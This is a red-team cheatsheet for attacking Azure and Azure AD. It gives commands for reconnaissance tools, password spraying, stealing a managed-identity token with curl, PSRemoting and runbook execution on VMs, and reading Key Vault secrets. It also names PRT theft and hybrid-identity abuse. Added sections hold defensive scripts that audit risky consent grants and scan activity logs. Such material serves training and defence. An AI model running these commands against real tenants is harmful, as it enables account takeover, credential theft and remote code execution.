Azure Redteam Cheatsheet

I. Reconnaissance (external)

Find the subdomain of the target

Using MicroBurst

. .\Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose

Enumerate valid e-mail addresses (input list with -f emails.txt, write the confirmed ones with -o validemails.txt)

II. Reconnaissance (internal)

Using ROADtools (roadrecon)

roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui

Using StormSpotter

python ssbackend.pyz
quasar.cmd serve -p 9091 --history

Using BloodHound with AzureHound

. C:\AzAD\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose

III. Initial attack

Password spraying (brute force)

Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose

Illicit Consent Grant attack.


IV. Lateral movement

Run the env command and look for IDENTITY_HEADER and IDENTITY_ENDPOINT (the App Service managed identity endpoint); the following snippet requests a token from it:

system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');


Check Deployments

Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>

Save deployment template

Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>

VM interaction:

Access the VM using PSRemoting

$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess

Transfer a file:

Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ -Verbose

Execute a command:

Invoke-Command -Session $sess -ScriptBlock { ls C:\Users\ }

Using a Hybrid Runbook Worker

List the Automation Hybrid Worker Groups:

Get-AzAutomationHybridWorkerGroup -AutomationAccountName <Automation_account_name> -ResourceGroupName <Resource_group_name>

Import a runbook, publish it, then start it on the worker group (the -RunOn parameter makes it execute on the hybrid worker machine):

Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose

Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Dump the PRT (Primary Refresh Token)

Use the PRT in Chrome

Abuse dynamic groups

Abuse proxy applications (Azure AD Application Proxy)

Check Azure AD Connect and the configured authentication type

Cloud to On-prem:

Abuse PTA (Pass-through Authentication)

Obtain the PRT cookie

The Global Administrator or Intune Administrator role can execute
PowerShell scripts on an enrolled Windows device

On-prem to Cloud:

Abuse PHS (Password Hash Sync)

V. Persistence

Add a new application that has high permissions and then use that for persistence
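Defender's counterpart to the illicit consent grant and application persistence techniques above, added here as an example (not part of the original post): it reports service principals that hold tenant-wide or user consent to sensitive Graph scopes, or that received a new credential recently. It assumes an existing Connect-AzureAD session; the scope list and the 30-day window are assumptions to adapt to the tenant.

```powershell
# Added audit example (not from the original post). Assumes Connect-AzureAD was run.
# The "high-risk" scope list and the look-back window are assumptions for illustration.
$HighRiskScopes = @('Directory.ReadWrite.All', 'RoleManagement.ReadWrite.Directory',
                    'Application.ReadWrite.All', 'Mail.Read', 'Mail.ReadWrite', 'Files.ReadWrite.All')
$LookbackDays   = 30

function Get-RiskyServicePrincipalReport {
    param([string[]]$RiskyScopes = $HighRiskScopes, [int]$Days = $LookbackDays)
    $since = (Get-Date).AddDays(-$Days)
    foreach ($sp in (Get-AzureADServicePrincipal -All $true)) {
        # Delegated permission grants: 'AllPrincipals' = admin consent for the whole tenant,
        # 'Principal' = a single user consented (the illicit consent grant pattern).
        $grants = Get-AzureADServicePrincipalOAuth2PermissionGrant -ObjectId $sp.ObjectId -All $true
        $hits = foreach ($g in $grants) {
            $bad = @($g.Scope -split ' ' | Where-Object { $RiskyScopes -contains $_ })
            if ($bad.Count -gt 0) {
                [pscustomobject]@{ ConsentType = $g.ConsentType; Scopes = ($bad -join ' ') }
            }
        }
        # A fresh secret or certificate on a privileged app is the persistence pattern above.
        $newCreds = @(
            @(Get-AzureADServicePrincipalPasswordCredential -ObjectId $sp.ObjectId) +
            @(Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId)
        ) | Where-Object { $_.StartDate -ge $since }
        if ($hits -or $newCreds) {
            [pscustomobject]@{
                DisplayName      = $sp.DisplayName
                AppId            = $sp.AppId
                AdminConsent     = (@($hits | Where-Object ConsentType -eq 'AllPrincipals').Scopes -join '; ')
                UserConsent      = (@($hits | Where-Object ConsentType -eq 'Principal').Scopes -join '; ')
                NewCredentials   = @($newCreds).Count
                NewestCredential = (@($newCreds) | Sort-Object StartDate -Descending | Select-Object -First 1).StartDate
            }
        }
    }
}

Get-RiskyServicePrincipalReport | Sort-Object NewCredentials -Descending | Format-Table -AutoSize
```

Review every row with a non-empty UserConsent column: a single user consenting to Mail or Files scopes for an unfamiliar app is the signature of the consent grant attack.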

Useful commands:

az login -u <UPN> -p testpassword

$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("<UPN>", $passwd)
Connect-AzureAD -Credential $creds

$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("<UPN>", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
Invoke-AzureHound -Verbose

Get all users

Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName    # only the UPNs

Show GAs

Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember

List all custom directory roles:

Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName

List resources (Az module)

Get all the role assignments for the test user

Get-AzRoleAssignment -SignInName <UPN>
Get-AzRoleAssignment -Scope <Scope>

Check the definition of this role

Get-AzRoleDefinition -Name <Role_name>

List all the VMs where the current user has at least the Reader role

Get-AzVM | fl
az vm list

List all App Services. Filter on the 'Kind' property, otherwise both App Services and Function Apps are listed

Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list                                  (list App Services)
az webapp list --query "[].[name]" -o table     (list only the names of the App Services)

To list Function Apps


List storage accounts

Get-AzStorageAccount | fl
az storage account list

List the Key Vaults readable by the current user and read their secrets

az keyvault list
Get-AzKeyVaultSecret -VaultName <VaultName>
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Secret_name> -AsPlainText

Check if there is a user logged-in to az cli on that machine

az ad signed-in-user show

Check if there is a public IP address attached to the VM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | select -ExpandProperty NetworkProfile

Get more details about the network interface attached to the VM

Get-AzNetworkInterface -Name <VM_interface>

Get the public IP address attached to the VM

Get-AzPublicIpAddress -Name <IP_name>

Get AzVM

Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *

Get information about the group and its member principals

Get-AzADGroup -DisplayName <Group_name>

Enumerate the service principals in Azure AD and find the one that <App_id> belongs to

Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl

Check whether any extensions are already installed on the VM

Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>

Run a PowerShell script file on the VM

Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose
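Every control-plane action in sections IV and V above (Run Command, extension install, runbook import and job start, deployment template export) lands in the subscription Activity Log. The triage script below is an added example, not from the original post: it takes the JSON array produced by `az monitor activity-log list -o json` and reports the watched operations. The operation-name table is this editor's assumption and should be verified against real log entries before use; the three records embedded are constructed for the demo.

```powershell
# Added detection example (not from the original post). Operation names are assumptions
# to confirm against your own Activity Log; the sample records below are constructed.
$WatchedOperations = @{
    'Microsoft.Compute/virtualMachines/runCommand/action'   = 'Run Command executed on VM'
    'Microsoft.Compute/virtualMachines/extensions/write'     = 'VM extension installed or updated'
    'Microsoft.Automation/automationAccounts/runbooks/write' = 'Runbook created or imported'
    'Microsoft.Automation/automationAccounts/jobs/write'     = 'Automation runbook job started'
    'Microsoft.Resources/deployments/exportTemplate/action'  = 'Deployment template exported'
}

function Find-WatchedActivity {
    param([Parameter(Mandatory)][string]$Json)
    $events = $Json | ConvertFrom-Json
    foreach ($e in $events) {
        $op = $e.operationName.value
        if (-not $WatchedOperations.ContainsKey($op)) { continue }
        if ($e.status.value -ne 'Succeeded') { continue }     # only completed operations
        [pscustomobject]@{
            Time      = [datetime]$e.eventTimestamp
            Caller    = $e.caller
            Resource  = ($e.resourceId -split '/')[-1]
            Finding   = $WatchedOperations[$op]
            Operation = $op
        }
    }
}

# Constructed sample export: one Run Command, one routine read (ignored), one extension write
$sample = @'
[
 {"operationName":{"value":"Microsoft.Compute/virtualMachines/runCommand/action"},
  "status":{"value":"Succeeded"},"caller":"user@example.com",
  "resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/vm01",
  "eventTimestamp":"2024-01-15T10:22:00Z"},
 {"operationName":{"value":"Microsoft.Compute/virtualMachines/read"},
  "status":{"value":"Succeeded"},"caller":"user@example.com",
  "resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/vm01",
  "eventTimestamp":"2024-01-15T10:20:00Z"},
 {"operationName":{"value":"Microsoft.Compute/virtualMachines/extensions/write"},
  "status":{"value":"Succeeded"},"caller":"svc-deploy@example.com",
  "resourceId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/vm01/extensions/CustomScriptExtension",
  "eventTimestamp":"2024-01-15T11:05:00Z"}
]
'@

Find-WatchedActivity -Json $sample | Sort-Object Time | Format-Table -AutoSize
# Against a live subscription: Find-WatchedActivity -Json (az monitor activity-log list --offset 7d -o json | Out-String)
```

The sample yields two findings (the Run Command and the extension write); compare the Caller column against the identities expected to administer those VMs.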

Published by Nhat Truong

